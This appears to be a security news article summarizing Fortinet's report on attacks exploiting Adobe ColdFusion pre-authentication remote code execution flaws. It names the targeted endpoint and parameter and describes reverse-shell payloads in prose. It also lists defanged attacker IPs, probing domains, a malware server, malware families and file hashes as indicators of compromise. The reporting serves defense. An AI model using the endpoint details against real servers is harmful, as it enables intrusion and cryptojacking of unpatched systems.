Adobe ColdFusion is a Java-based, commercial web app development platform using CFML for server-side programming.
ColdFusion is primarily known for its tag-based approach, which is unique in nature. Besides this, it is also popular among developers for its adaptability across various industries.
The cybersecurity researchers at Fortinet recently affirmed that Windows and macOS users face risk from Adobe ColdFusion vulnerabilities, targeted by remote attackers for pre-authentication RCE exploits.
Technical Analysis
Hackers target the URI ‘/CFIDE/adminapi/accessmanager.cfc,’ injecting payloads via a POST request into the ‘argumentCollection’ parameter.
By using the interactsh tool, researchers spotted probing activities in July. While this tool generates domain names for testing exploits and monitoring vulnerabilities.
Probing activities involving interactsh tool (Source – Fortinet)
Threat actors can misuse it to validate the vulnerabilities by monitoring the domains, and here are the related domains collected by security experts:-
- mooo-ng[.]com
- redteam[.]tf
- h4ck4fun[.]xyz
Probing activities involving other domains (Source – Fortinet)
Attackers employ reverse shells for exploiting system vulnerabilities, like in Adobe ColdFusion, using Base64-encoded payloads.
It’s been identified that from several IP addresses, all these attacks originated, and here below we have mentioned them:-
- 81[.]68[.]214[.]122
- 81[.]68[.]197[.]3
- 82[.]156[.]147[.]183
The malware was distributed from a publicly accessible HTTP file server:-
- 103[.]255[.]177[.]55[:]6895
Malware Variants
Here below we have mentioned all the malware variants that were discovered by the security analyst:-
- XMRig Miner: It’s a software program that uses CPU cycles for Monero mining, for both legitimate and malicious purposes.
- DDoS/Lucifer: It’s a hybrid bot with cryptojacking, DDoS, C2, vulnerability exploitation, and DDoS capabilities, which was reported in 2020.
- RudeMiner: It’s also a hybrid version of a malware bot that targets the crypto wallet and carries out DDoS attacks.
- BillGates/Setag: This version of the backdoor is mainly known for hijacking, C2 server communication, and attacks. However, in this scenario, through the checking process procedure with the file “bill.lock,” this malware could be detected.
Researchers monitoring a weeks-long Adobe ColdFusion vulnerability noticed ongoing attacks despite available patches, urging immediate upgrades.
IoCs
Attacker’s IP Address:
- 81[.]68[.]214[.]122
- 81[.]68[.]197[.]3
- 82[.]156[.]147[.]183
Malware Server’s IP Address:
- 103[.]255[.]177[.]55:6895
Files:
- 7c6f0bae1e588821bd5d66cd98f52b7005e054279748c2c851647097fa2ae2df
- 590d3088ed566cb3d85d48f4914cc657ee49b7d33e85c72167e7c72d81d4cb6c
- 808f0f85aee6be3d3f3dd4bb827f556401c4d69a642ba4b1cb3645368954622e
- 4f22fea4d0fadd2e01139021f98f04d3cae678e6526feb61fa8a6eceda13296a